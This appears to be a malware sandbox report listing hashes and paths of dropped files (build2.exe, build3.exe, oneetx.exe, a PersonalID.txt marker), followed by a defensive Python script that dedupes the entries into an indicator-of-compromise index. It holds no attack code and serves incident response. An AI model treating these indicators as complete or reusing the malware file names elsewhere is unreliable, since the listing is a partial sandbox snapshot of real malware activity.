MD5 004a3cb730b4590ce541e289d857650b
SHA1 bc6fcc924a3e867d8e340eb2dca48b38e2014acd
SHA256 214dc3e69982978d353c9f39929981fed9fb68e774e10eefff7a2b3b08103539
SHA512 297c2384d2a08016daeb5729de304a67b4c5c89203b00941e7258e00ba808448102e2b09bad3a461e9ac7d2f2a33f2d31b5b06f6d57b3628537489309fe8c646

memory/2264-355-0x0000000005B40000-0x0000000005C25000-memory.dmp

memory/2264-358-0x0000000005B40000-0x0000000005C25000-memory.dmp

memory/2452-359-0x0000000000400000-0x0000000000537000-memory.dmp

memory/2452-357-0x0000000000400000-0x0000000000537000-memory.dmp

memory/2264-361-0x0000000005B40000-0x0000000005C25000-memory.dmp

memory/2264-364-0x0000000005B40000-0x0000000005C25000-memory.dmp

memory/2264-366-0x0000000005B40000-0x0000000005C25000-memory.dmp

memory/2264-370-0x0000000004B20000-0x0000000004B30000-memory.dmp

memory/2264-372-0x0000000072D10000-0x00000000734C0000-memory.dmp

memory/4940-374-0x0000000000400000-0x0000000000537000-memory.dmp

C:\Users\Admin\AppData\Local\bowsakkdestx.txt

MD5 e3c640eced72a28f10eac99da233d9fd
SHA1 1d7678afc24a59de1da0bf74126baf3b8540b5b0
SHA256 87de9c0701eab8d410954dc4d3e7e6013ca6a0c8a514969418a12c21135f133e
SHA512 bcb94b7ba487784d343961b24107ea17a82f200961505927ef385caeb0684fbbe1a3482b7d0af7f3766b9ec2c4d6236341b50541cf7b1217acdc0a8b5b37e3d7

C:\SystemID\PersonalID.txt

MD5 324770a7653f940b6e66d90455f6e1a8
SHA1 5b9edb85029710a458f7a77f474721307d2fb738
SHA256 9dda9cd8e2b81a8d0d46e39f4495130246582b673b7ddddef4ebecfeeb6bbc30
SHA512 48ae3a8b8a45881285ff6117edd0ca42fe2b06b0d868b2d535f82a9c26157d3c434535d91b7a9f33cf3c627bc49e469bf997077edcfff6b83e4d7e30cf9dea23

C:\Users\Admin\AppData\Roaming\futssgt

MD5 c9de9148f899b175350adb5cd3d077e5
SHA1 9de7bf5a1f2bed9a48e505e88efdd164453afc44
SHA256 c792eb7144a343e7d3b9036a0df4381353c265e5574522687b2df0be2685fc6e
SHA512 ce786835569989c36820217cd4594f02d0aa9cb2602587dc5da3b38fa8cfda24b98930b635f777bfa8219e46f44a243a056c0b758ab90d748a7b75464e76ed43

C:\Users\Admin\AppData\Local\68c6f755-7763-4772-a6bd-cee0894fe0a0\build2.exe

MD5 5c08a40f82908735b187705b49de1fc3
SHA1 6e108f3f6611f46941869d7fcbe02c47219c0523
SHA256 7539d1cff13c822fbffc73cb9416dd8ae40d79f59b03b1e77b0909e182b6bd2b
SHA512 76d06c1686e1ec9bec07188769e3a851b98f042e962eee74bd195e156d15fd9ebc4997b10af092561178ef3918e86dd620d7070934db7b1f5a5449c19cfbe1fd

C:\Users\Admin\AppData\Local\68c6f755-7763-4772-a6bd-cee0894fe0a0\build2.exe

MD5 5c08a40f82908735b187705b49de1fc3
SHA1 6e108f3f6611f46941869d7fcbe02c47219c0523
SHA256 7539d1cff13c822fbffc73cb9416dd8ae40d79f59b03b1e77b0909e182b6bd2b
SHA512 76d06c1686e1ec9bec07188769e3a851b98f042e962eee74bd195e156d15fd9ebc4997b10af092561178ef3918e86dd620d7070934db7b1f5a5449c19cfbe1fd

C:\Users\Admin\AppData\Local\68c6f755-7763-4772-a6bd-cee0894fe0a0\build2.exe

MD5 5c08a40f82908735b187705b49de1fc3
SHA1 6e108f3f6611f46941869d7fcbe02c47219c0523
SHA256 7539d1cff13c822fbffc73cb9416dd8ae40d79f59b03b1e77b0909e182b6bd2b
SHA512 76d06c1686e1ec9bec07188769e3a851b98f042e962eee74bd195e156d15fd9ebc4997b10af092561178ef3918e86dd620d7070934db7b1f5a5449c19cfbe1fd

C:\Users\Admin\AppData\Local\49b14743-4b55-4121-a8bb-034070746508\build2.exe

MD5 5c08a40f82908735b187705b49de1fc3
SHA1 6e108f3f6611f46941869d7fcbe02c47219c0523
SHA256 7539d1cff13c822fbffc73cb9416dd8ae40d79f59b03b1e77b0909e182b6bd2b
SHA512 76d06c1686e1ec9bec07188769e3a851b98f042e962eee74bd195e156d15fd9ebc4997b10af092561178ef3918e86dd620d7070934db7b1f5a5449c19cfbe1fd

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

MD5 a64a886a695ed5fb9273e73241fec2f7
SHA1 363244ca05027c5beb938562df5b525a2428b405
SHA256 563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144
SHA512 122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474

memory/1584-428-0x00000000026A0000-0x00000000026F0000-memory.dmp

C:\Users\Admin\AppData\Local\68c6f755-7763-4772-a6bd-cee0894fe0a0\build3.exe

MD5 9ead10c08e72ae41921191f8db39bc16
SHA1 abe3bce01cd34afc88e2c838173f8c2bd0090ae1
SHA256 8d7f0e6b6877bdfb9f4531afafd0451f7d17f0ac24e2f2427e9b4ecc5452b9f0
SHA512 aa35dbc59a3589df2763e76a495ce5a9e62196628b4c1d098add38bd7f27c49edf93a66fb8507fb746e37ee32932da2460e440f241abe1a5a279abcc1e5ffe4a

C:\Users\Admin\AppData\Local\49b14743-4b55-4121-a8bb-034070746508\build3.exe

MD5 9ead10c08e72ae41921191f8db39bc16
SHA1 abe3bce01cd34afc88e2c838173f8c2bd0090ae1
SHA256 8d7f0e6b6877bdfb9f4531afafd0451f7d17f0ac24e2f2427e9b4ecc5452b9f0
SHA512 aa35dbc59a3589df2763e76a495ce5a9e62196628b4c1d098add38bd7f27c49edf93a66fb8507fb746e37ee32932da2460e440f241abe1a5a279abcc1e5ffe4a

memory/4804-500-0x0000018958C60000-0x0000018958C82000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_su5arbkg.2z2.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4804-543-0x00007FF8AE410000-0x00007FF8AEED1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 9c97a801bb5d6c21c265ab7f283ba83e
SHA1 7c0a4cb73d63702a2d454268d983e0dcb36a8bf8
SHA256 69d9676a8c93686c904d9ce6193221476d6c72bc4d3250a232c03ccbeae380c7
SHA512 d3abd8bfccd3a3fec55c13e85e755fbd589e6ea04321169c7c8cf5badf7b6ffe96c0c2ed449a0b4a99ecfd1e7bb7edc3311d335c8956cf344c9584fb0bda50d9

C:\Users\Admin\AppData\Local\Temp\XandETC.exe

MD5 6bb0e62356310422a56cc9f501f608fb
SHA1 c880c827b387f56b1009c270a0a14e220b1a4bf1
SHA256 2b04188a1fb6b12b72ceb5e63c4ea64f61dbe7aa9a0f3ed5f306e9184d56c1b0
SHA512 e4e71cf6d925a5e27522db3bc4c14d530a97d4e1992fc3f972e29d076feaf1226f0790721be37ca7b06ab757a775fbc24422d367abc6062f2f98973a48aa5c41
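The listing above is the raw sandbox output: the same build2.exe and build3.exe hashes are reported repeatedly, and under two different GUID-named directories in AppData\Local, so a hunting rule keyed on the literal sandbox path would miss the second drop location on a real host. The script below is an added example, not part of this report or any sandbox vendor's tooling. It parses a "path / hash lines" listing of this shape into a deduplicated SHA256 index, rewrites sandbox-specific paths into environment-variable patterns (user profile folders replaced with %APPDATA%, %LOCALAPPDATA%, %TEMP%, and GUID segments with {GUID}), and checks a file's bytes against the index. The embedded sample is an excerpt of the entries above with the SHA512 lines omitted for brevity; the path normalization rules are an assumption about how a responder would generalize these paths, not something the report states.

```python
"""Turn a sandbox 'Files' listing into a deduplicated, path-normalized IOC set."""
import hashlib
import re
from collections import defaultdict

# Hash lines in the listing look like "SHA256 <hex>"; anything else is a path (or a memory dump name).
HASH_LINE = re.compile(r"^(MD5|SHA1|SHA256|SHA512)\s+([0-9a-fA-F]+)$")
HEX_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}

GUID = re.compile(r"[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}", re.I)
# Order matters: the Temp prefix must be tested before the broader Local prefix.
PROFILE_PREFIXES = [
    (re.compile(r"^C:\\Users\\[^\\]+\\AppData\\Local\\Temp", re.I), "%TEMP%"),
    (re.compile(r"^C:\\Users\\[^\\]+\\AppData\\Local", re.I), "%LOCALAPPDATA%"),
    (re.compile(r"^C:\\Users\\[^\\]+\\AppData\\Roaming", re.I), "%APPDATA%"),
]

# Excerpt of the report's file listing (SHA512 lines dropped); the duplicated build2.exe entry is deliberate.
SAMPLE = r"""
C:\Users\Admin\AppData\Roaming\futssgt

MD5 c9de9148f899b175350adb5cd3d077e5
SHA1 9de7bf5a1f2bed9a48e505e88efdd164453afc44
SHA256 c792eb7144a343e7d3b9036a0df4381353c265e5574522687b2df0be2685fc6e

C:\Users\Admin\AppData\Local\68c6f755-7763-4772-a6bd-cee0894fe0a0\build2.exe

MD5 5c08a40f82908735b187705b49de1fc3
SHA1 6e108f3f6611f46941869d7fcbe02c47219c0523
SHA256 7539d1cff13c822fbffc73cb9416dd8ae40d79f59b03b1e77b0909e182b6bd2b

C:\Users\Admin\AppData\Local\68c6f755-7763-4772-a6bd-cee0894fe0a0\build2.exe

MD5 5c08a40f82908735b187705b49de1fc3
SHA1 6e108f3f6611f46941869d7fcbe02c47219c0523
SHA256 7539d1cff13c822fbffc73cb9416dd8ae40d79f59b03b1e77b0909e182b6bd2b

C:\Users\Admin\AppData\Local\49b14743-4b55-4121-a8bb-034070746508\build2.exe

MD5 5c08a40f82908735b187705b49de1fc3
SHA1 6e108f3f6611f46941869d7fcbe02c47219c0523
SHA256 7539d1cff13c822fbffc73cb9416dd8ae40d79f59b03b1e77b0909e182b6bd2b

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

MD5 a64a886a695ed5fb9273e73241fec2f7
SHA1 363244ca05027c5beb938562df5b525a2428b405
SHA256 563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144

memory/1584-428-0x00000000026A0000-0x00000000026F0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\XandETC.exe

MD5 6bb0e62356310422a56cc9f501f608fb
SHA1 c880c827b387f56b1009c270a0a14e220b1a4bf1
SHA256 2b04188a1fb6b12b72ceb5e63c4ea64f61dbe7aa9a0f3ed5f306e9184d56c1b0
"""


def parse_file_listing(text):
    """Return [(path, {algo: hexdigest})] in order of appearance.

    A hash line attaches to the most recent path line; memory-dump names carry no hashes.
    A digest of the wrong length for its algorithm is treated as a corrupted entry.
    """
    entries, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = HASH_LINE.match(line)
        if m and current is not None:
            algo, digest = m.group(1), m.group(2).lower()
            if len(digest) != HEX_LEN[algo]:
                raise ValueError(f"bad {algo} length for {current[0]}: {digest}")
            current[1][algo] = digest
        else:
            current = (line, {})
            entries.append(current)
    return entries


def dedupe(entries):
    """Collapse repeated (path, hashes) records, keeping first-seen order."""
    seen, out = set(), []
    for path, hashes in entries:
        key = (path, tuple(sorted(hashes.items())))
        if key not in seen:
            seen.add(key)
            out.append((path, hashes))
    return out


def group_by_sha256(entries):
    """Map each SHA256 to the distinct on-disk paths it was observed at."""
    groups = defaultdict(list)
    for path, hashes in entries:
        sha = hashes.get("SHA256")
        if sha and path not in groups[sha]:
            groups[sha].append(path)
    return dict(groups)


def normalize_path(path):
    """Rewrite a sandbox path into a host-independent pattern (assumed rules, see lead-in)."""
    for rx, env in PROFILE_PREFIXES:
        path, n = rx.subn(env, path, count=1)
        if n:
            break
    return GUID.sub("{GUID}", path)


def matches_ioc(data, iocs):
    """Return the listing paths whose SHA256 equals that of `data`, or [] if none."""
    return iocs.get(hashlib.sha256(data).hexdigest(), [])


if __name__ == "__main__":
    iocs = group_by_sha256(dedupe(parse_file_listing(SAMPLE)))
    for sha, paths in iocs.items():
        print(sha, sorted({normalize_path(p) for p in paths}))
```

Run against the full listing, the index is what a responder actually needs: one row per distinct binary, with the normalized path patterns to search for. Note that %TEMP%\207aa4515d is itself a per-infection random directory name, so for that entry the hash, not the path, is the reliable indicator.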